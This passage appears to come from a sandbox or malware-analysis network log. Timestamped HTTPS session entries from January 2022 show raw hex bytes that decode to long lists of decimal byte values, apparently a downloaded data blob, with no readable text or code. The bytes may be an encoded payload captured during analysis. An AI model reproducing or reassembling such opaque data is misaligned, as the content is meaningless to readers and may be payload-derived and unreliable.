                                                                                                                                                                      2022-01-14 11:21:19 UTC1064INData Raw: 34 34 2c 35 35 2c 37 37 2c 32 30 31 2c 31 30 35 2c 35 37 2c 31 35 32 2c 31 36 36 2c 32 32 38 2c 31 38 34 2c 36 35 2c 37 34 2c 31 34 32 2c 31 32 2c 38 32 2c 31 37 38 2c 31 34 32 2c 36 35 2c 37 34 2c 31 35 36 2c 39 35 2c 33 36 2c 32 31 39 2c 34 37 2c 35 33 2c 32 34 2c 31 32 33 2c 32 32 31 2c 39 2c 35 33 2c 38 35 2c 31 31 2c 31 38 32 2c 33 2c 35 31 2c 31 33 31 2c 32 34 37 2c 32 31 39 2c 32 33 38 2c 31 36 38 2c 37 31 2c 31 38 34 2c 32 31 37 2c 32 34 2c 32 30 36 2c 36 32 2c 35 30 2c 31 35 35 2c 36 32 2c 35 34 2c 32 33 37 2c 31 39 31 2c 32 33 39 2c 34 31 2c 32 30 30 2c 37 37 2c 31 31 38 2c 32 30 33 2c 31 30 31 2c 32 33 31 2c 31 30 39 2c 31 35 30 2c 31 34 32 2c 34 2c 35 36 2c 31 38 34 2c 31 32 33 2c 32 30 34 2c 31 31 31 2c 31 38 2c 31 33 39 2c 32 34 31 2c 32 30
                                                                                                                                                                      Data Ascii: 44,55,77,201,105,57,152,166,228,184,65,74,142,12,82,178,142,65,74,156,95,36,219,47,53,24,123,221,9,53,85,11,182,3,51,131,247,219,238,168,71,184,217,24,206,62,50,155,62,54,237,191,239,41,200,77,118,203,101,231,109,150,142,4,56,184,123,204,111,18,139,241,20
                                                                                                                                                                      2022-01-14 11:21:19 UTC1080INData Raw: 2c 32 34 32 2c 32 33 31 2c 35 38 2c 31 32 32 2c 31 31 36 2c 38 37 2c 31 38 35 2c 31 30 32 2c 33 34 2c 31 30 33 2c 32 33 36 2c 36 31 2c 39 37 2c 32 38 2c 39 35 2c 31 37 37 2c 32 35 35 2c 32 30 30 2c 31 38 32 2c 32 30 30 2c 32 35 2c 31 31 39 2c 31 35 30 2c 32 33 34 2c 32 34 38 2c 32 32 2c 31 38 33 2c 31 30 39 2c 39 34 2c 32 31 30 2c 31 37 34 2c 32 30 30 2c 32 35 2c 31 30 32 2c 32 33 35 2c 35 36 2c 35 34 2c 31 34 33 2c 32 32 33 2c 31 34 36 2c 31 32 33 2c 34 31 2c 31 31 34 2c 31 39 38 2c 31 39 38 2c 32 33 32 2c 35 36 2c 31 31 38 2c 34 33 2c 31 39 31 2c 31 34 39 2c 31 30 39 2c 31 34 35 2c 35 31 2c 37 38 2c 32 35 2c 31 35 2c 31 37 39 2c 31 32 34 2c 31 36 33 2c 31 30 38 2c 31 33 39 2c 31 35 36 2c 38 31 2c 37 33 2c 32 31 34 2c 31 38 31 2c 32 32 31 2c 32 30 33 2c
                                                                                                                                                                      Data Ascii: ,242,231,58,122,116,87,185,102,34,103,236,61,97,28,95,177,255,200,182,200,25,119,150,234,248,22,183,109,94,210,174,200,25,102,235,56,54,143,223,146,123,41,114,198,198,232,56,118,43,191,149,109,145,51,78,25,15,179,124,163,108,139,156,81,73,214,181,221,203,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1096INData Raw: 31 36 37 2c 37 38 2c 32 30 39 2c 31 36 39 2c 31 33 31 2c 34 2c 33 2c 32 33 36 2c 31 37 34 2c 31 39 32 2c 31 37 38 2c 32 37 2c 36 37 2c 32 34 32 2c 31 32 36 2c 31 32 2c 31 31 34 2c 35 33 2c 31 39 31 2c 38 31 2c 31 34 32 2c 32 32 35 2c 37 36 2c 38 36 2c 32 34 34 2c 31 35 37 2c 32 32 34 2c 35 32 2c 32 31 30 2c 32 34 39 2c 36 37 2c 31 36 31 2c 32 30 37 2c 31 39 31 2c 34 38 2c 31 36 37 2c 32 32 36 2c 36 30 2c 31 38 30 2c 31 37 32 2c 38 33 2c 37 39 2c 32 34 2c 32 34 32 2c 31 30 36 2c 34 38 2c 31 30 30 2c 31 37 38 2c 32 33 31 2c 31 39 34 2c 31 38 37 2c 32 33 38 2c 32 32 34 2c 38 34 2c 31 31 37 2c 32 35 30 2c 31 38 36 2c 32 35 34 2c 32 32 30 2c 32 33 33 2c 32 31 38 2c 32 32 39 2c 32 31 32 2c 36 37 2c 31 30 30 2c 31 34 34 2c 31 39 35 2c 31 31 37 2c 32 30 39 2c 31
                                                                                                                                                                      Data Ascii: 167,78,209,169,131,4,3,236,174,192,178,27,67,242,126,12,114,53,191,81,142,225,76,86,244,157,224,52,210,249,67,161,207,191,48,167,226,60,180,172,83,79,24,242,106,48,100,178,231,194,187,238,224,84,117,250,186,254,220,233,218,229,212,67,100,144,195,117,209,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1103INData Raw: 35 2c 31 38 35 2c 31 33 35 2c 31 33 31 2c 31 34 34 2c 34 38 2c 31 31 38 2c 32 33 35 2c 34 39 2c 36 36 2c 37 35 2c 32 30 33 2c 31 32 34 2c 37 31 2c 32 33 33 2c 32 33 39 2c 33 35 2c 31 30 39 2c 31 32 36 2c 32 35 33 2c 31 34 34 2c 39 34 2c 31 32 36 2c 31 31 31 2c 37 35 2c 37 31 2c 31 30 31 2c 31 34 37 2c 33 34 2c 31 39 32 2c 30 2c 31 39 38 2c 33 30 2c 31 35 32 2c 30 2c 32 2c 31 33 30 2c 32 32 34 2c 32 35 2c 31 39 39 2c 31 37 34 2c 31 35 2c 31 36 38 2c 39 32 2c 38 31 2c 39 38 2c 31 32 36 2c 31 33 33 2c 31 38 38 2c 30 2c 32 30 30 2c 32 33 38 2c 38 39 2c 31 31 2c 32 35 31 2c 31 32 2c 31 35 39 2c 34 33 2c 39 34 2c 31 35 35 2c 32 33 31 2c 31 37 39 2c 32 31 36 2c 31 33 32 2c 38 32 2c 32 31 31 2c 31 37 2c 31 33 30 2c 34 37 2c 32 32 2c 31 33 31 2c 39 33 2c 31 32 2c
                                                                                                                                                                      Data Ascii: 5,185,135,131,144,48,118,235,49,66,75,203,124,71,233,239,35,109,126,253,144,94,126,111,75,71,101,147,34,192,0,198,30,152,0,2,130,224,25,199,174,15,168,92,81,98,126,133,188,0,200,238,89,11,251,12,159,43,94,155,231,179,216,132,82,211,17,130,47,22,131,93,12,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1119INData Raw: 36 2c 37 39 2c 31 31 34 2c 39 32 2c 32 32 38 2c 31 34 30 2c 31 37 34 2c 32 35 30 2c 31 35 32 2c 34 30 2c 32 34 38 2c 33 30 2c 31 30 32 2c 31 37 36 2c 31 31 33 2c 31 35 30 2c 31 34 35 2c 31 32 2c 36 2c 32 32 36 2c 36 37 2c 32 35 31 2c 31 35 31 2c 35 32 2c 32 34 39 2c 32 34 31 2c 39 2c 39 36 2c 31 31 34 2c 37 38 2c 32 33 32 2c 31 37 34 2c 31 32 34 2c 37 39 2c 31 37 2c 35 34 2c 32 30 36 2c 32 34 36 2c 32 30 33 2c 31 36 38 2c 32 31 37 2c 31 33 30 2c 32 32 38 2c 35 33 2c 31 35 30 2c 32 34 34 2c 31 31 37 2c 31 34 36 2c 31 32 30 2c 31 37 37 2c 31 37 39 2c 32 34 34 2c 31 32 2c 36 33 2c 31 30 32 2c 39 35 2c 36 38 2c 31 39 30 2c 32 2c 32 32 37 2c 31 32 39 2c 32 31 30 2c 31 35 38 2c 32 34 36 2c 31 31 2c 32 33 32 2c 36 32 2c 35 37 2c 37 37 2c 31 30 34 2c 31 33 2c 31
                                                                                                                                                                      Data Ascii: 6,79,114,92,228,140,174,250,152,40,248,30,102,176,113,150,145,12,6,226,67,251,151,52,249,241,9,96,114,78,232,174,124,79,17,54,206,246,203,168,217,130,228,53,150,244,117,146,120,177,179,244,12,63,102,95,68,190,2,227,129,210,158,246,11,232,62,57,77,104,13,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1135INData Raw: 2c 39 39 2c 32 30 32 2c 38 33 2c 39 34 2c 31 34 36 2c 31 38 30 2c 32 32 2c 31 31 34 2c 31 39 38 2c 31 39 39 2c 31 32 35 2c 31 31 37 2c 31 38 36 2c 35 35 2c 32 30 30 2c 37 32 2c 31 36 2c 32 31 35 2c 39 31 2c 31 34 39 2c 31 38 30 2c 31 35 30 2c 31 32 2c 39 35 2c 32 30 34 2c 31 30 35 2c 31 37 33 2c 31 37 31 2c 31 33 37 2c 36 37 2c 32 35 31 2c 35 31 2c 36 33 2c 33 30 2c 32 30 38 2c 32 30 33 2c 36 35 2c 38 30 2c 35 34 2c 31 37 33 2c 31 34 30 2c 31 33 33 2c 35 38 2c 31 32 30 2c 31 30 35 2c 33 31 2c 31 33 37 2c 37 32 2c 35 36 2c 31 31 37 2c 31 36 33 2c 31 35 31 2c 39 35 2c 31 38 32 2c 35 35 2c 31 33 38 2c 37 30 2c 33 32 2c 39 36 2c 39 30 2c 31 38 37 2c 37 35 2c 31 33 31 2c 32 32 31 2c 31 36 35 2c 34 2c 32 35 2c 32 31 36 2c 31 31 33 2c 38 32 2c 31 33 34 2c 39 36
                                                                                                                                                                      Data Ascii: ,99,202,83,94,146,180,22,114,198,199,125,117,186,55,200,72,16,215,91,149,180,150,12,95,204,105,173,171,137,67,251,51,63,30,208,203,65,80,54,173,140,133,58,120,105,31,137,72,56,117,163,151,95,182,55,138,70,32,96,90,187,75,131,221,165,4,25,216,113,82,134,96
                                                                                                                                                                      2022-01-14 11:21:19 UTC1151INData Raw: 31 31 38 2c 32 30 34 2c 32 35 33 2c 36 2c 31 31 34 2c 32 33 33 2c 32 35 32 2c 31 33 37 2c 32 31 30 2c 32 36 2c 32 34 38 2c 32 37 2c 31 30 30 2c 37 33 2c 36 34 2c 31 39 39 2c 31 39 39 2c 31 30 34 2c 32 32 32 2c 31 37 37 2c 38 30 2c 32 32 38 2c 32 34 38 2c 32 33 39 2c 34 33 2c 32 33 31 2c 31 37 36 2c 32 34 37 2c 31 39 37 2c 39 34 2c 38 37 2c 32 31 30 2c 31 38 33 2c 32 39 2c 37 38 2c 34 30 2c 31 37 35 2c 32 35 32 2c 38 31 2c 32 30 31 2c 31 36 31 2c 31 31 31 2c 31 37 36 2c 37 2c 31 33 31 2c 31 37 33 2c 35 31 2c 32 32 36 2c 32 30 31 2c 32 31 37 2c 37 31 2c 31 34 34 2c 31 38 39 2c 31 38 2c 31 36 39 2c 32 30 32 2c 32 32 30 2c 36 39 2c 31 32 30 2c 37 30 2c 31 30 34 2c 31 2c 31 31 34 2c 36 37 2c 37 35 2c 31 34 35 2c 39 37 2c 31 34 38 2c 32 32 32 2c 31 37 36 2c 31
                                                                                                                                                                      Data Ascii: 118,204,253,6,114,233,252,137,210,26,248,27,100,73,64,199,199,104,222,177,80,228,248,239,43,231,176,247,197,94,87,210,183,29,78,40,175,252,81,201,161,111,176,7,131,173,51,226,201,217,71,144,189,18,169,202,220,69,120,70,104,1,114,67,75,145,97,148,222,176,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1167INData Raw: 2c 37 30 2c 32 31 36 2c 37 39 2c 38 37 2c 31 34 34 2c 33 37 2c 32 33 31 2c 35 30 2c 35 30 2c 31 33 36 2c 39 32 2c 32 33 30 2c 32 31 39 2c 31 30 35 2c 37 38 2c 38 32 2c 39 30 2c 31 30 33 2c 31 31 32 2c 32 37 2c 38 36 2c 39 35 2c 32 35 34 2c 31 31 39 2c 36 30 2c 31 35 31 2c 32 35 35 2c 32 39 2c 31 31 31 2c 32 31 38 2c 32 30 39 2c 31 37 30 2c 38 31 2c 31 33 35 2c 31 37 37 2c 31 35 2c 32 32 38 2c 31 34 33 2c 31 34 39 2c 31 34 34 2c 32 34 39 2c 31 31 36 2c 32 34 37 2c 32 32 35 2c 31 39 37 2c 31 33 38 2c 30 2c 32 31 38 2c 31 30 30 2c 33 31 2c 32 39 2c 32 31 36 2c 31 37 36 2c 39 31 2c 31 32 39 2c 37 37 2c 31 32 30 2c 35 31 2c 32 31 37 2c 36 37 2c 32 34 35 2c 38 32 2c 32 30 32 2c 32 34 37 2c 32 32 33 2c 32 32 32 2c 31 36 36 2c 31 35 37 2c 32 32 2c 32 33 36 2c 37
                                                                                                                                                                      Data Ascii: ,70,216,79,87,144,37,231,50,50,136,92,230,219,105,78,82,90,103,112,27,86,95,254,119,60,151,255,29,111,218,209,170,81,135,177,15,228,143,149,144,249,116,247,225,197,138,0,218,100,31,29,216,176,91,129,77,120,51,217,67,245,82,202,247,223,222,166,157,22,236,7
                                                                                                                                                                      2022-01-14 11:21:19 UTC1173INData Raw: 2c 35 34 2c 32 33 31 2c 31 33 31 2c 31 37 34 2c 36 32 2c 31 32 30 2c 32 33 32 2c 33 38 2c 32 31 37 2c 38 2c 31 35 33 2c 31 31 33 2c 36 30 2c 31 37 32 2c 31 37 36 2c 32 33 2c 33 37 2c 34 31 2c 32 30 36 2c 31 34 35 2c 32 33 34 2c 33 30 2c 37 33 2c 34 31 2c 35 37 2c 32 33 34 2c 33 30 2c 31 33 39 2c 32 31 35 2c 31 32 36 2c 36 2c 31 36 38 2c 32 31 2c 31 36 2c 32 34 38 2c 31 39 32 2c 31 32 35 2c 32 30 39 2c 31 38 36 2c 37 38 2c 35 36 2c 32 34 37 2c 31 36 36 2c 32 32 31 2c 39 37 2c 32 38 2c 37 39 2c 31 33 35 2c 31 34 34 2c 32 34 34 2c 33 36 2c 38 30 2c 31 38 34 2c 31 39 31 2c 31 32 33 2c 31 38 38 2c 31 31 36 2c 32 32 32 2c 37 37 2c 31 38 31 2c 36 2c 31 34 35 2c 31 37 39 2c 31 30 2c 32 30 36 2c 37 2c 31 36 33 2c 37 34 2c 31 37 35 2c 32 34 30 2c 31 30 35 2c 31 32
                                                                                                                                                                      Data Ascii: ,54,231,131,174,62,120,232,38,217,8,153,113,60,172,176,23,37,41,206,145,234,30,73,41,57,234,30,139,215,126,6,168,21,16,248,192,125,209,186,78,56,247,166,221,97,28,79,135,144,244,36,80,184,191,123,188,116,222,77,181,6,145,179,10,206,7,163,74,175,240,105,12
                                                                                                                                                                      2022-01-14 11:21:19 UTC1189INData Raw: 37 2c 31 39 32 2c 32 31 30 2c 35 39 2c 35 37 2c 32 32 2c 31 31 30 2c 32 30 39 2c 31 31 2c 31 30 39 2c 36 38 2c 31 30 34 2c 34 2c 31 38 30 2c 39 39 2c 31 34 30 2c 31 33 35 2c 37 31 2c 31 31 30 2c 36 37 2c 37 33 2c 31 38 2c 31 39 34 2c 32 34 31 2c 31 36 2c 37 33 2c 38 34 2c 38 37 2c 32 30 33 2c 38 38 2c 31 38 39 2c 31 38 2c 32 37 2c 31 36 33 2c 38 37 2c 35 30 2c 32 35 32 2c 32 2c 31 39 34 2c 39 34 2c 32 31 35 2c 31 37 30 2c 32 33 39 2c 31 38 39 2c 37 39 2c 33 32 2c 37 38 2c 38 33 2c 31 38 32 2c 31 37 30 2c 31 32 33 2c 31 32 34 2c 32 31 37 2c 32 31 2c 31 37 30 2c 31 30 35 2c 32 39 2c 32 38 2c 34 33 2c 32 33 38 2c 31 39 2c 32 33 33 2c 33 39 2c 38 32 2c 32 30 2c 33 34 2c 33 35 2c 31 36 2c 38 32 2c 32 30 32 2c 31 31 2c 32 31 32 2c 32 33 34 2c 38 37 2c 32 31 33
                                                                                                                                                                      Data Ascii: 7,192,210,59,57,22,110,209,11,109,68,104,4,180,99,140,135,71,110,67,73,18,194,241,16,73,84,87,203,88,189,18,27,163,87,50,252,2,194,94,215,170,239,189,79,32,78,83,182,170,123,124,217,21,170,105,29,28,43,238,19,233,39,82,20,34,35,16,82,202,11,212,234,87,213
                                                                                                                                                                      2022-01-14 11:21:19 UTC1205INData Raw: 37 2c 33 30 2c 31 34 33 2c 31 35 39 2c 36 31 2c 32 34 38 2c 37 37 2c 32 34 36 2c 32 32 38 2c 32 31 33 2c 32 33 38 2c 38 35 2c 36 30 2c 32 31 2c 36 33 2c 31 32 33 2c 32 32 37 2c 31 36 31 2c 35 30 2c 38 31 2c 31 39 38 2c 31 33 30 2c 32 31 30 2c 32 33 31 2c 31 34 39 2c 32 34 36 2c 31 34 34 2c 31 39 36 2c 35 37 2c 31 33 34 2c 31 34 2c 33 32 2c 31 31 35 2c 34 30 2c 38 32 2c 38 39 2c 31 36 32 2c 35 38 2c 31 31 32 2c 33 31 2c 31 33 30 2c 31 34 33 2c 32 32 39 2c 31 37 31 2c 31 36 31 2c 31 34 2c 37 2c 32 33 37 2c 35 30 2c 31 35 39 2c 31 39 2c 31 38 34 2c 39 39 2c 37 31 2c 31 39 2c 31 38 2c 31 37 30 2c 31 30 33 2c 34 36 2c 37 33 2c 34 37 2c 39 36 2c 32 31 31 2c 32 33 31 2c 35 2c 39 31 2c 36 37 2c 32 30 30 2c 31 32 32 2c 34 34 2c 31 36 38 2c 39 34 2c 31 32 30 2c 32
                                                                                                                                                                      Data Ascii: 7,30,143,159,61,248,77,246,228,213,238,85,60,21,63,123,227,161,50,81,198,130,210,231,149,246,144,196,57,134,14,32,115,40,82,89,162,58,112,31,130,143,229,171,161,14,7,237,50,159,19,184,99,71,19,18,170,103,46,73,47,96,211,231,5,91,67,200,122,44,168,94,120,2
                                                                                                                                                                      2022-01-14 11:21:19 UTC1221INData Raw: 2c 32 37 2c 39 2c 32 32 36 2c 31 39 39 2c 31 38 34 2c 31 35 31 2c 31 39 34 2c 32 34 36 2c 35 38 2c 36 35 2c 36 33 2c 31 32 39 2c 36 36 2c 32 34 32 2c 31 34 38 2c 31 32 33 2c 33 37 2c 31 34 36 2c 31 30 37 2c 38 30 2c 34 30 2c 31 30 35 2c 31 32 35 2c 31 39 2c 31 36 36 2c 32 33 35 2c 32 31 35 2c 39 39 2c 33 2c 34 34 2c 37 35 2c 39 30 2c 31 33 36 2c 31 30 30 2c 31 30 34 2c 31 37 33 2c 31 39 37 2c 31 37 30 2c 32 35 33 2c 34 32 2c 31 39 36 2c 31 36 32 2c 32 30 35 2c 34 35 2c 32 30 35 2c 32 31 34 2c 32 30 32 2c 37 37 2c 31 35 30 2c 32 30 38 2c 39 31 2c 31 31 36 2c 31 37 30 2c 31 30 34 2c 32 34 38 2c 36 2c 31 31 34 2c 33 38 2c 32 30 36 2c 31 33 2c 31 37 35 2c 38 32 2c 31 33 37 2c 32 30 39 2c 31 38 37 2c 31 37 2c 33 33 2c 31 30 34 2c 32 30 32 2c 32 32 33 2c 31 39
                                                                                                                                                                      Data Ascii: ,27,9,226,199,184,151,194,246,58,65,63,129,66,242,148,123,37,146,107,80,40,105,125,19,166,235,215,99,3,44,75,90,136,100,104,173,197,170,253,42,196,162,205,45,205,214,202,77,150,208,91,116,170,104,248,6,114,38,206,13,175,82,137,209,187,17,33,104,202,223,19
                                                                                                                                                                      2022-01-14 11:21:19 UTC1237INData Raw: 31 39 2c 38 32 2c 38 31 2c 31 30 34 2c 31 34 36 2c 37 39 2c 34 38 2c 31 36 38 2c 39 38 2c 32 32 38 2c 31 33 36 2c 32 32 35 2c 39 36 2c 32 31 38 2c 38 38 2c 31 31 31 2c 35 32 2c 31 39 36 2c 33 32 2c 31 31 32 2c 31 39 33 2c 33 37 2c 31 37 36 2c 31 38 37 2c 32 2c 31 31 38 2c 32 31 35 2c 32 30 39 2c 39 36 2c 31 37 32 2c 31 34 31 2c 31 33 33 2c 31 37 35 2c 38 38 2c 31 34 39 2c 36 33 2c 31 37 38 2c 31 39 32 2c 32 32 30 2c 33 38 2c 31 30 34 2c 32 32 32 2c 31 36 34 2c 35 33 2c 36 30 2c 31 30 36 2c 31 38 38 2c 31 38 2c 31 35 34 2c 32 32 30 2c 31 39 30 2c 37 32 2c 31 32 39 2c 31 2c 33 38 2c 31 2c 31 34 33 2c 31 36 39 2c 32 35 34 2c 31 33 31 2c 32 2c 31 34 2c 31 38 2c 31 38 37 2c 34 32 2c 32 35 32 2c 31 33 33 2c 32 37 2c 32 2c 37 31 2c 32 32 34 2c 35 37 2c 31 34 36
                                                                                                                                                                      Data Ascii: 19,82,81,104,146,79,48,168,98,228,136,225,96,218,88,111,52,196,32,112,193,37,176,187,2,118,215,209,96,172,141,133,175,88,149,63,178,192,220,38,104,222,164,53,60,106,188,18,154,220,190,72,129,1,38,1,143,169,254,131,2,14,18,187,42,252,133,27,2,71,224,57,146
                                                                                                                                                                      2022-01-14 11:21:19 UTC1253INData Raw: 32 35 35 2c 36 37 2c 32 35 31 2c 31 34 33 2c 31 32 30 2c 38 38 2c 32 31 36 2c 35 2c 31 32 32 2c 32 38 2c 32 33 2c 35 34 2c 32 34 30 2c 32 34 30 2c 35 37 2c 31 37 36 2c 32 32 31 2c 31 39 39 2c 32 35 31 2c 32 30 38 2c 31 37 37 2c 32 32 37 2c 31 34 2c 31 2c 31 35 38 2c 36 32 2c 32 33 31 2c 32 30 37 2c 31 35 38 2c 36 33 2c 31 30 39 2c 32 33 38 2c 31 32 36 2c 37 38 2c 31 33 36 2c 37 39 2c 38 39 2c 31 35 34 2c 31 33 34 2c 37 39 2c 31 34 34 2c 31 33 38 2c 38 31 2c 39 31 2c 31 33 33 2c 31 34 31 2c 31 34 36 2c 38 33 2c 39 35 2c 31 33 32 2c 31 34 33 2c 31 35 33 2c 31 39 39 2c 32 31 36 2c 32 30 30 2c 32 30 34 2c 36 35 2c 32 37 2c 31 39 37 2c 37 39 2c 31 33 31 2c 31 30 32 2c 31 36 37 2c 35 34 2c 32 31 32 2c 35 39 2c 37 31 2c 34 33 2c 31 38 38 2c 36 39 2c 36 38 2c 31
                                                                                                                                                                      Data Ascii: 255,67,251,143,120,88,216,5,122,28,23,54,240,240,57,176,221,199,251,208,177,227,14,1,158,62,231,207,158,63,109,238,126,78,136,79,89,154,134,79,144,138,81,91,133,141,146,83,95,132,143,153,199,216,200,204,65,27,197,79,131,102,167,54,212,59,71,43,188,69,68,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1269INData Raw: 31 39 37 2c 31 38 37 2c 31 39 35 2c 31 39 2c 32 32 37 2c 31 32 35 2c 37 39 2c 31 39 38 2c 37 31 2c 32 33 30 2c 31 32 36 2c 36 32 2c 32 34 38 2c 35 37 2c 32 35 35 2c 31 30 39 2c 32 34 36 2c 32 33 33 2c 32 30 32 2c 32 30 34 2c 32 32 30 2c 32 34 30 2c 32 30 38 2c 32 30 38 2c 31 34 33 2c 32 30 39 2c 33 31 2c 33 35 2c 31 38 33 2c 31 33 30 2c 31 37 34 2c 36 39 2c 32 34 35 2c 37 2c 39 35 2c 37 35 2c 31 33 37 2c 31 35 2c 31 34 31 2c 31 32 31 2c 32 38 2c 33 31 2c 31 32 32 2c 35 31 2c 32 35 34 2c 37 34 2c 32 33 36 2c 31 34 39 2c 31 33 32 2c 31 30 37 2c 31 33 37 2c 32 33 33 2c 31 34 35 2c 31 37 37 2c 31 36 39 2c 32 33 2c 39 35 2c 32 34 35 2c 32 34 37 2c 31 32 36 2c 32 33 36 2c 32 30 33 2c 32 30 36 2c 31 37 33 2c 31 37 34 2c 32 30 31 2c 31 37 31 2c 31 33 37 2c 31 37
                                                                                                                                                                      Data Ascii: 197,187,195,19,227,125,79,198,71,230,126,62,248,57,255,109,246,233,202,204,220,240,208,208,143,209,31,35,183,130,174,69,245,7,95,75,137,15,141,121,28,31,122,51,254,74,236,149,132,107,137,233,145,177,169,23,95,245,247,126,236,203,206,173,174,201,171,137,17
                                                                                                                                                                      2022-01-14 11:21:19 UTC1283INData Raw: 38 37 2c 38 37 2c 32 35 30 2c 31 35 39 2c 31 38 39 2c 31 32 35 2c 32 34 32 2c 32 34 36 2c 38 39 2c 32 33 32 2c 32 31 32 2c 32 30 33 2c 32 34 36 2c 31 34 33 2c 37 37 2c 39 33 2c 31 32 35 2c 34 37 2c 38 33 2c 31 35 31 2c 32 35 30 2c 32 31 39 2c 31 38 37 2c 31 35 38 2c 36 32 2c 32 35 2c 31 32 37 2c 32 31 31 2c 38 39 2c 32 35 35 2c 31 38 31 2c 31 38 37 2c 31 30 33 2c 39 37 2c 31 31 36 2c 31 32 36 2c 31 31 34 2c 31 32 36 2c 35 32 2c 31 38 39 2c 39 2c 31 37 32 2c 31 35 2c 31 32 35 2c 39 33 2c 31 35 33 2c 31 37 34 2c 32 33 36 2c 38 39 2c 39 30 2c 31 35 36 2c 31 35 39 2c 32 36 2c 31 30 34 2c 32 35 33 2c 32 35 34 2c 31 30 39 2c 32 34 30 2c 32 33 31 2c 31 33 39 2c 32 33 39 2c 32 32 35 2c 31 35 31 2c 31 39 35 2c 31 34 36 2c 31 33 31 2c 31 34 36 2c 31 35 38 2c 31 33
                                                                                                                                                                      Data Ascii: 87,87,250,159,189,125,242,246,89,232,212,203,246,143,77,93,125,47,83,151,250,219,187,158,62,25,127,211,89,255,181,187,103,97,116,126,114,126,52,189,9,172,15,125,93,153,174,236,89,90,156,159,26,104,253,254,109,240,231,139,239,225,151,195,146,131,146,158,13
                                                                                                                                                                      2022-01-14 11:21:19 UTC1299INData Raw: 30 2c 32 30 34 2c 31 34 39 2c 31 39 37 2c 31 34 34 2c 32 34 31 2c 35 33 2c 32 32 35 2c 31 36 35 2c 32 34 31 2c 39 34 2c 32 33 34 2c 31 37 33 2c 31 37 2c 34 34 2c 37 37 2c 32 33 33 2c 31 34 2c 31 31 2c 31 32 38 2c 31 30 31 2c 34 31 2c 36 31 2c 31 32 2c 32 35 32 2c 39 32 2c 31 33 35 2c 31 39 32 2c 31 31 34 2c 31 34 39 2c 31 35 38 2c 31 36 38 2c 32 31 37 2c 39 36 2c 31 32 31 2c 37 34 2c 31 31 31 2c 32 31 32 2c 33 34 2c 39 37 2c 36 31 2c 31 34 39 2c 31 39 30 2c 31 36 38 2c 31 39 37 2c 31 34 36 2c 35 33 2c 31 30 31 2c 32 34 39 2c 37 34 2c 36 33 2c 31 34 30 2c 32 35 34 2c 31 38 30 2c 35 34 2c 31 33 32 2c 31 39 38 2c 32 30 33 2c 38 37 2c 32 34 32 2c 31 31 33 2c 36 38 2c 32 39 2c 32 34 39 2c 36 33 2c 31 36 37 2c 32 30 34 2c 31 33 34 2c 31 34 34 2c 32 34 31 2c 31
                                                                                                                                                                      Data Ascii: 0,204,149,197,144,241,53,225,165,241,94,234,173,17,44,77,233,14,11,128,101,41,61,12,252,92,135,192,114,149,158,168,217,96,121,74,111,212,34,97,61,149,190,168,197,146,53,101,249,74,63,140,254,180,54,132,198,203,87,242,113,68,29,249,63,167,204,134,144,241,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1315INData Raw: 32 33 34 2c 32 35 31 2c 31 30 38 2c 37 35 2c 32 32 2c 32 34 37 2c 32 31 36 2c 31 38 36 2c 31 38 34 2c 31 35 34 2c 32 31 37 2c 31 35 37 2c 34 31 2c 32 34 35 2c 32 33 35 2c 32 34 33 2c 31 33 32 2c 31 33 39 2c 33 2c 35 39 2c 35 30 2c 31 38 31 2c 32 35 34 2c 32 31 36 2c 32 35 31 2c 31 38 36 2c 35 38 2c 31 37 36 2c 36 31 2c 32 30 37 2c 32 31 33 2c 33 39 2c 37 31 2c 31 38 35 2c 31 38 36 2c 34 39 2c 31 39 31 2c 38 39 2c 38 38 2c 32 31 2c 31 30 30 2c 32 32 37 2c 32 30 30 2c 31 37 34 2c 39 2c 31 36 33 2c 32 33 35 2c 31 39 30 2c 37 36 2c 31 31 37 2c 39 39 2c 32 34 33 2c 31 30 33 2c 36 33 2c 31 35 33 2c 31 38 31 2c 32 37 2c 31 37 31 2c 31 35 32 2c 34 35 2c 37 30 2c 32 33 31 2c 31 37 39 2c 31 31 38 2c 39 39 2c 32 34 38 2c 31 39 37 2c 31 34 38 2c 31 34 33 2c 31 30 37
                                                                                                                                                                      Data Ascii: 234,251,108,75,22,247,216,186,184,154,217,157,41,245,235,243,132,139,3,59,50,181,254,216,251,186,58,176,61,207,213,39,71,185,186,49,191,89,88,21,100,227,200,174,9,163,235,190,76,117,99,243,103,63,153,181,27,171,152,45,70,231,179,118,99,248,197,148,143,107
                                                                                                                                                                      2022-01-14 11:21:19 UTC1331INData Raw: 31 2c 31 2c 31 35 30 2c 33 33 2c 31 30 39 2c 34 39 2c 31 30 38 2c 31 36 34 2c 31 38 30 2c 32 32 39 2c 31 37 36 2c 36 39 2c 32 31 30 2c 32 32 32 2c 31 33 30 2c 31 30 39 2c 31 35 31 2c 32 34 36 2c 35 34 2c 32 33 36 2c 31 37 32 2c 31 38 30 2c 32 34 35 2c 39 38 2c 32 31 2c 32 34 34 2c 31 34 37 2c 32 34 37 2c 31 33 31 2c 31 38 34 2c 31 35 34 2c 32 31 30 2c 36 32 2c 31 33 30 2c 32 31 2c 37 34 2c 32 31 39 2c 33 38 2c 32 35 30 2c 31 34 38 2c 31 38 32 2c 31 39 2c 31 38 32 2c 36 39 2c 39 30 2c 34 35 2c 32 33 36 2c 31 34 38 2c 31 38 30 2c 31 38 39 2c 34 38 2c 31 33 35 2c 31 32 34 2c 31 31 33 2c 36 32 2c 33 35 2c 33 35 2c 31 35 30 2c 32 34 31 2c 31 38 31 2c 35 32 2c 36 34 2c 36 32 2c 32 30 33 2c 36 39 2c 38 32 2c 32 31 38 2c 33 33 2c 34 39 2c 31 32 32 2c 31 32 39 2c
                                                                                                                                                                      Data Ascii: 1,1,150,33,109,49,108,164,180,229,176,69,210,222,130,109,151,246,54,236,172,180,245,98,21,244,147,247,131,184,154,210,62,130,21,74,219,38,250,148,182,19,182,69,90,45,236,148,180,189,48,135,124,113,62,35,35,150,241,181,52,64,62,203,69,82,218,33,49,122,129,
